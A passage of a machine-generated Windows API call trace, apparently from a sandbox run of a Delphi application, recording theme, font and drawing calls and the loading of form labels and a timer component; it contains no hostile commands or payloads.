dwFlags=0x0, lpWideCharStr="DrawThemeParentBackground", cchWideChar=25, lpMultiByteStr=0x71e6c6c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeParentBackground", lpUsedDefaultChar=0x0) returned 25 [0039.658] GetProcAddress (hModule=0x74090000, lpProcName="DrawThemeParentBackground") returned 0x740953e5 [0039.658] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableTheming", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0039.658] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableTheming", cchWideChar=13, lpMultiByteStr=0x71ca1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EnableTheming", lpUsedDefaultChar=0x0) returned 13 [0039.658] GetProcAddress (hModule=0x74090000, lpProcName="EnableTheming") returned 0x740c2feb [0039.658] GetFileVersionInfoSizeW (in: lptstrFilename="comctl32.dll", lpdwHandle=0x68ff5b4 | out: lpdwHandle=0x68ff5b4) returned 0x73c [0039.659] GetFileVersionInfoW (in: lptstrFilename="comctl32.dll", dwHandle=0x0, dwLen=0x73c, lpData=0x714b1d0 | out: lpData=0x714b1d0) returned 1 [0039.659] VerQueryValueW (in: pBlock=0x714b1d0, lpSubBlock="\\", lplpBuffer=0x68ff5ac, puLen=0x68ff5a8 | out: lplpBuffer=0x68ff5ac*=0x714b1f8, puLen=0x68ff5a8) returned 1 [0039.659] IsAppThemed () returned 0x1 [0039.659] IsThemeActive () returned 0x1 [0039.659] GetDC (hWnd=0x0) returned 0x20010728 [0039.659] MoveToEx (in: hdc=0x20010728, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0039.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71bb7b4, cbMultiByte=6, lpWideCharStr=0x68fe170, cchWideChar=2047 | out: lpWideCharStr="Tahoma") returned 6 [0039.659] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x71bb7b4, cbMultiByte=6, lpWideCharStr=0x71ca21c, cchWideChar=7 | out: lpWideCharStr="Tahoma") returned 6 [0039.659] CreateFontIndirectW (lplf=0x68ff1a8) returned 0x130a01ce [0039.659] SelectObject (hdc=0x20010728, h=0x130a01ce) returned 0x18a002e [0039.659] GetSysColor (nIndex=8) returned 0x0 [0039.659] SetTextColor (hdc=0x20010728, color=0x0) returned 0x0 [0039.662] CreatePenIndirect (plpen=0x68ff204) returned 0x1f3001b7 [0039.662] SelectObject (hdc=0x20010728, h=0x1f3001b7) returned 0x1b00017 [0039.662] SetROP2 (hdc=0x20010728, rop2=13) returned 13 [0039.662] CreateBrushIndirect (plbrush=0x68ff204) returned 0x17100741 [0039.662] UnrealizeObject (h=0x17100741) returned 1 [0039.662] SelectObject (hdc=0x20010728, h=0x17100741) returned 0x1900010 [0039.662] SetBkColor (hdc=0x20010728, color=0xffffff) returned 0xffffff [0039.662] SetBkMode (hdc=0x20010728, mode=2) returned 2 [0039.662] GetSysColor (nIndex=8) returned 0x0 [0039.662] GetSysColor (nIndex=14) returned 0xffffff [0039.662] OpenThemeData () returned 0x20016 [0039.663] GetProcAddress (hModule=0x74090000, lpProcName="DrawThemeTextEx") returned 0x740963e6 [0039.663] DrawThemeTextEx () returned 0x0 [0039.681] SelectObject (hdc=0x20010728, h=0x1b00017) returned 0x1f3001b7 [0039.681] SelectObject (hdc=0x20010728, h=0x1900015) returned 0x17100741 [0039.681] SelectObject (hdc=0x20010728, h=0x18a002e) returned 0x130a01ce [0039.681] GetCurrentPositionEx (in: hdc=0x20010728, lppt=0x68ff278 | out: lppt=0x68ff278) returned 1 [0039.681] ReleaseDC (hWnd=0x0, hDC=0x20010728) returned 1 [0039.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4ad, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ô\x8f\x06", lpUsedDefaultChar=0x0) returned 0 [0039.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Label1", cchWideChar=6, lpMultiByteStr=0x68ff4ad, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Label1", lpUsedDefaultChar=0x0) returned 6 [0039.681] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8528, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.681] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8528, cbMultiByte=4, lpWideCharStr=0x71d15f0, cchWideChar=4 | out: lpWideCharStr="Left") returned 4 [0039.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca23c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Left", lpUsedDefaultChar=0x0) returned 4 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8528, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8528, cbMultiByte=3, lpWideCharStr=0x71d15f0, cchWideChar=3 | out: lpWideCharStr="Topt") returned 3 [0039.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca1fc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1608, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1608, cbMultiByte=5, lpWideCharStr=0x71d1620, cchWideChar=5 | out: lpWideCharStr="Width") returned 5 [0039.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Width", cchWideChar=5, lpMultiByteStr=0x71ca23c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Width", lpUsedDefaultChar=0x0) returned 5 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15f0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15f0, cbMultiByte=6, lpWideCharStr=0x71d1608, cchWideChar=6 | out: lpWideCharStr="Height\x01") returned 6 [0039.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Height", cchWideChar=6, lpMultiByteStr=0x71dffc4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Height", lpUsedDefaultChar=0x0) returned 6 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15f0, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15f0, cbMultiByte=7, lpWideCharStr=0x71ca1f8, cchWideChar=7 | out: lpWideCharStr="Captiont") returned 7 [0039.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Caption", cchWideChar=7, lpMultiByteStr=0x71dffc4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Caption", lpUsedDefaultChar=0x0) returned 7 [0039.682] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d15f0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.682] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d15f0, cbMultiByte=6, lpWideCharStr=0x71d1608, cchWideChar=6 | out: lpWideCharStr="Label1\x01") returned 6 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1608, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1608, cbMultiByte=6, lpWideCharStr=0x71d1620, cchWideChar=6 | out: lpWideCharStr="TLabel") returned 6 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1608, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1608, cbMultiByte=6, lpWideCharStr=0x71d1620, cchWideChar=6 | out: lpWideCharStr="Label2") returned 6 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca23c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.682] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 3 [0039.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6ca4767, cbMultiByte=6, lpWideCharStr=0x71ca23c, cchWideChar=7 | out: lpWideCharStr="TLabel") returned 6 [0039.682] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TLabel", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 2 [0039.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff499, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07\x07", lpUsedDefaultChar=0x0) returned 0 [0039.683] GetCurrentThreadId () returned 0xc04 [0039.683] GetCurrentThreadId () returned 0xc04 [0039.683] GetCurrentThreadId () returned 0xc04 [0039.683] GetDC (hWnd=0x0) returned 0x20010728 [0039.683] MoveToEx (in: hdc=0x20010728, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0039.683] SelectObject (hdc=0x20010728, h=0x130a01ce) returned 0x18a002e [0039.683] GetSysColor (nIndex=8) returned 0x0 [0039.683] SetTextColor (hdc=0x20010728, color=0x0) returned 0x0 [0039.684] SelectObject (hdc=0x20010728, h=0x1f3001b7) returned 0x1b00017 [0039.684] SetROP2 (hdc=0x20010728, rop2=13) returned 13 [0039.684] UnrealizeObject (h=0x17100741) returned 1 [0039.684] SelectObject (hdc=0x20010728, h=0x17100741) returned 0x1900010 [0039.684] SetBkColor (hdc=0x20010728, color=0xffffff) returned 0xffffff [0039.684] SetBkMode (hdc=0x20010728, mode=2) returned 2 [0039.684] GetSysColor (nIndex=8) returned 0x0 [0039.684] GetSysColor (nIndex=14) returned 0xffffff [0039.684] DrawThemeTextEx () returned 0x0 [0039.684] SelectObject (hdc=0x20010728, h=0x1b00017) returned 0x1f3001b7 [0039.684] SelectObject (hdc=0x20010728, h=0x1900015) returned 0x17100741 [0039.684] SelectObject (hdc=0x20010728, h=0x18a002e) returned 0x130a01ce [0039.684] GetCurrentPositionEx (in: hdc=0x20010728, lppt=0x68ff278 | out: lppt=0x68ff278) returned 1 [0039.684] ReleaseDC (hWnd=0x0, hDC=0x20010728) returned 1 [0039.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4ad, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07", lpUsedDefaultChar=0x0) returned 0 [0039.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Label2", cchWideChar=6, lpMultiByteStr=0x68ff4ad, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Label2", lpUsedDefaultChar=0x0) returned 6 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x71d1620, cchWideChar=4 | out: lpWideCharStr="Leftl2") returned 4 [0039.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca1fc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Leftp", lpUsedDefaultChar=0x0) returned 4 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x71d1620, cchWideChar=3 | out: lpWideCharStr="Toptl2") returned 3 [0039.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1638, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1638, cbMultiByte=5, lpWideCharStr=0x71d1650, cchWideChar=5 | out: lpWideCharStr="Width") returned 5 [0039.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Width", cchWideChar=5, lpMultiByteStr=0x71ca1fc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Width", lpUsedDefaultChar=0x0) returned 5 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1620, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1620, cbMultiByte=6, lpWideCharStr=0x71d1638, cchWideChar=6 | out: lpWideCharStr="Height\x01") returned 6 [0039.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Height", cchWideChar=6, lpMultiByteStr=0x71e0064, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Height", lpUsedDefaultChar=0x0) returned 6 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1620, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1620, cbMultiByte=7, lpWideCharStr=0x71ca298, cchWideChar=7 | out: lpWideCharStr="Captiont") returned 7 [0039.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Caption", cchWideChar=7, lpMultiByteStr=0x71e0064, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Caption", lpUsedDefaultChar=0x0) returned 7 [0039.685] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d1620, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.685] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d1620, cbMultiByte=6, lpWideCharStr=0x71d1638, cchWideChar=6 | out: lpWideCharStr="Label2\x01") returned 6 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1638, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1638, cbMultiByte=6, lpWideCharStr=0x71d1650, cchWideChar=6 | out: lpWideCharStr="TLabel") returned 6 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1638, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1638, cbMultiByte=6, lpWideCharStr=0x71d1650, cchWideChar=6 | out: lpWideCharStr="Label3") returned 6 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca1fc, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.685] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 3 [0039.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6ca4767, cbMultiByte=6, lpWideCharStr=0x71ca1fc, cchWideChar=7 | out: lpWideCharStr="TLabel") returned 6 [0039.685] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TLabel", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 2 [0039.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff499, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡\x1c\x07\x07", lpUsedDefaultChar=0x0) returned 0 [0039.686] GetCurrentThreadId () returned 0xc04 [0039.686] GetCurrentThreadId () returned 0xc04 [0039.686] GetCurrentThreadId () returned 0xc04 [0039.686] GetDC (hWnd=0x0) returned 0x20010728 [0039.686] MoveToEx (in: hdc=0x20010728, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0039.686] SelectObject (hdc=0x20010728, h=0x130a01ce) returned 0x18a002e [0039.687] GetSysColor (nIndex=8) returned 0x0 [0039.687] SetTextColor (hdc=0x20010728, color=0x0) returned 0x0 [0039.687] SelectObject (hdc=0x20010728, h=0x1f3001b7) returned 0x1b00017 [0039.687] SetROP2 (hdc=0x20010728, rop2=13) returned 13 [0039.687] UnrealizeObject (h=0x17100741) returned 1 [0039.687] SelectObject (hdc=0x20010728, h=0x17100741) returned 0x1900010 [0039.687] SetBkColor (hdc=0x20010728, color=0xffffff) returned 0xffffff [0039.687] SetBkMode (hdc=0x20010728, mode=2) returned 2 [0039.687] GetSysColor (nIndex=8) returned 0x0 [0039.687] GetSysColor (nIndex=14) returned 0xffffff [0039.687] DrawThemeTextEx () returned 0x0 [0039.687] SelectObject (hdc=0x20010728, h=0x1b00017) returned 0x1f3001b7 [0039.687] SelectObject (hdc=0x20010728, h=0x1900015) returned 0x17100741 [0039.687] SelectObject (hdc=0x20010728, h=0x18a002e) returned 0x130a01ce [0039.687] GetCurrentPositionEx (in: hdc=0x20010728, lppt=0x68ff278 | out: lppt=0x68ff278) returned 1 [0039.687] ReleaseDC (hWnd=0x0, hDC=0x20010728) returned 1 [0039.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4ad, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡\x1c\x07", lpUsedDefaultChar=0x0) returned 0 [0039.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Label3", cchWideChar=6, lpMultiByteStr=0x68ff4ad, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Label3", lpUsedDefaultChar=0x0) returned 6 [0039.687] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.687] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x71d1650, cchWideChar=4 | out: lpWideCharStr="Leftl3") returned 4 [0039.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Leftp", lpUsedDefaultChar=0x0) returned 4 [0039.687] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.687] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x71d1650, cchWideChar=3 | out: lpWideCharStr="Toptl3") returned 3 [0039.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca2dc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.687] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0039.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=5, lpWideCharStr=0x71d1680, cchWideChar=5 | out: lpWideCharStr="Width") returned 5 [0039.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Width", cchWideChar=5, lpMultiByteStr=0x71ca29c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Width", lpUsedDefaultChar=0x0) returned 5 [0039.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1650, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1650, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="Height\x01") returned 6 [0039.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Height", cchWideChar=6, lpMultiByteStr=0x71e0104, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Height", lpUsedDefaultChar=0x0) returned 6 [0039.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1650, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1650, cbMultiByte=7, lpWideCharStr=0x71ca2d8, cchWideChar=7 | out: lpWideCharStr="Captiont") returned 7 [0039.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Caption", cchWideChar=7, lpMultiByteStr=0x71e0104, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Caption", lpUsedDefaultChar=0x0) returned 7 [0039.688] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d1650, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.688] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d1650, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="Label3\x01") returned 6 [0039.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x71d1680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0039.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x71d1680, cchWideChar=6 | out: lpWideCharStr="tmrI8M") returned 6 [0039.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡\x1c\x07çF\x95u<¡\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.688] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.688] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x40148 [0039.689] SetWindowLongW (hWnd=0x40148, nIndex=-4, dwNewLong=83759035) returned 112917644 [0039.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrI8M", cchWideChar=6, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrI8M", lpUsedDefaultChar=0x0) returned 6 [0039.689] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.689] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=8, lpWideCharStr=0x71ca298, cchWideChar=8 | out: lpWideCharStr="Interval") returned 8 [0039.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x71e6d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval", lpUsedDefaultChar=0x0) returned 8 [0039.689] KillTimer (hWnd=0x40148, uIDEvent=0x1) returned 0 [0039.689] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca2d8, cchWideChar=7 | out: lpWideCharStr="OnTimeron") returned 7 [0039.690] WideCharToMultiByte (in: 